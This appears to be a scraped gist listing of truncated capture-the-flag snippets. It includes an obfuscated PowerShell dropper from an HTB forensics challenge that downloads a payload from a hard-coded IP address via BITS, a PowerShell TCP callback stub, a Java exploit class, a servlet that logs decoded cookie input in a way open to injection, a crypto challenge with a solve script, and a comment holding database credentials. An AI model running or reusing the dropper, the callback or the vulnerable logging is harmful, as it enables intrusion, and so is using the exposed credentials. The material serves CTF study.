This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Sample ps1 dropper from HTB:CA2023 Forensics Interstellar C2 challenge. DO NOT EXECUTE! USE OF THIS IS AT YOUR OWN RISK! | |
.("{1}{0}{2}" -f'T','Set-i','em') ('vAriA'+'ble'+':q'+'L'+'z0so') ( [tYpe]("{0}{1}{2}{3}" -F'SySTEM.i','o.Fi','lE','mode')) ; &("{0}{2}{1}" -f'set-Vari','E','ABL') l60Yu3 ( [tYPe]("{7}{0}{5}{4}{3}{1}{2}{6}"-F'm.','ph','Y.ae','A','TY.crypTOgR','SeCuRi','S','sYSte')); .("{0}{2}{1}{3}" -f 'Set-V','i','AR','aBle') BI34 ( [TyPE]("{4}{7}{0}{1}{3}{2}{8}{5}{10}{6}{9}" -f 'TEm.secU','R','Y.CrY','IT','s','Y.','D','yS','pTogrAPH','E','CrypTOSTReAmmo')); ${U`Rl} = ("{0}{4}{1}{5}{8}{6}{2}{7}{9}{3}"-f 'htt','4f0','53-41ab-938','d8e51','p://64.226.84.200/9497','8','58','a-ae1bd8','-','6') | |
${P`TF} = "$env:temp\94974f08-5853-41ab-938a-ae1bd86d8e51" | |
.("{2}{1}{3}{0}"-f'ule','M','Import-','od') ("{2}{0}{3}{1}"-f 'r','fer','BitsT','ans') | |
.("{4}{5}{3}{1}{2}{0}"-f'r','-BitsT','ransfe','t','S','tar') -Source ${u`Rl} -Destination ${p`Tf} | |
${Fs} = &("{1}{0}{2}" -f 'w-Ob','Ne','ject') ("{1}{2}{0}"-f 'eam',' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$encoding = New-Object System.Text.AsciiEncoding | |
[System.Net.Sockets.TcpClient] $tcpClient = [System.Net.Sockets.TcpClient]::new("pwnme.maveris.fun", "8888") | |
$tcpStream = $tcpClient.GetStream() | |
[System.IO.BinaryReader] $reader = [System.IO.BinaryReader]::new($tcpStream) | |
[System.IO.BinaryWriter] $writer = [System.IO.BinaryWriter]::new($tcpStream) | |
$cli = $false | |
$auth = $false | |
$res = @() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from Crypto.Util.Padding import pad | |
from Crypto.Util import Counter | |
from Crypto.Cipher import AES | |
import os | |
class Encryptor: | |
def __init__(self): | |
self.key = os.urandom(16) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from encrypt import Encryptor | |
from secret import FLAG | |
import socketserver | |
import random | |
import signal | |
import json | |
MODES = ['ECB', 'CBC', 'CFB', 'OFB', 'CTR'] | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import json | |
import binascii | |
ip = '127.0.0.1' | |
port = 1337 | |
r = remote(ip, port) | |
while True: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
crypto_whole_lotta_candy/solve.py | |
[x] Opening connection to 127.0.0.1 on port 1337 | |
[x] Opening connection to 127.0.0.1 on port 1337: Trying 127.0.0.1 | |
[+] Opening connection to 127.0.0.1 on port 1337: Done | |
Please interact with the server using json data! | |
Selected mode is ECB. | |
Options: | |
1.Encrypt flag |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.net.Socket; | |
public class YuleLogExploit { | |
public YuleLogExploit() throws Exception { | |
String cmd; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if (!optionalLoginCookie.isPresent() || !CookieHandler.verifyLoginCookie(optionalLoginCookie.get())) { | |
out.println( | |
"<h1> You are a not authenticated, kindly login. </h1>"); | |
request.getRequestDispatcher("login.jsp").include(request, response); | |
} else { | |
... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Optional<Cookie> optionalDebugCookie = Arrays.stream(request.getCookies()) | |
.filter(cookie -> "debug".equals(cookie.getName())) | |
.findAny(); | |
//Log debug information for authenticated users | |
optionalDebugCookie.ifPresent(cookie -> { | |
logger.error( | |
new String(Base64.getDecoder().decode(cookie.getValue()))); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function errorMessage() { | |
var error = document.getElementById("error") | |
if (isNaN(document.getElementById("number").value)) | |
{ | |
// Complete the connection to mysqldb | |
// escalator.c45luksaam7a.us-east-1.rds.amazonaws.com | |
// Use credential allen:8%pZ-s^Z+P4d=h@P | |
error.textContent = "Under Construction" | |
error.style.color = "red" |